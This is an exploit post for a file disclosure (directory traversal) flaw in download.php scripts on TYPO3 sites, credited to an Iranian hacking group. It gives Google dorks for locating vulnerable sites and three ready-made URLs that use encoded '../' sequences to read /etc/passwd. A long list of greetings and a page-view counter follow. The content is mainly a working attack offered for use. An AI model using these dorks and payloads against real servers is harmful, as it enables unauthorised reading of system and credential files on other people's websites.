########################### # Exploit Title : Typo3 File Disclosure # Exploit Author : Iran Security Team # Discovered By : Red.Eagle # Home : WWW.IrSecTeam.org # Dork1 : inurl:fileadmin/php/commun/download.php # Dork2 : inurl:fileadmin/scripts/download.php # Date: 2013 1 November # Tested on:windows 7 # Software Link: http://typo3.org/ # Contact To Me: https://www.facebook.com/r3d.3agl3 ########################### # # Exmple :http://127.0.0.1/fileadmin/php/commun/download.php?file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd # # Exmple :http://127.0.0.1/fileadmin/scripts/download.php?path=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd # # Exmple :http://127.0.0.1/fileadmin/php/download.php?path=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd # # Sp Tnx To : Special Tnx To : Det3cT0r - GoldHat - Mr.Rahgozar - Mehran BBC - Game Over - Z3ro C00l - Retn0Hack - Saeed0511 - Ir.Soldier - Red.Eagle - Alimp5 - Arshia Mahkom - Poya21 - Exploit Black - Hot0n - 4m!r - Hasani_farhad - InJecTable - Mosi.Pro - Kandgi_Boy And All Members Of Iran Security Team # # ###########################Брой прочитания на тази страница: 987
Typo3 – Directory Traversal Vulnerability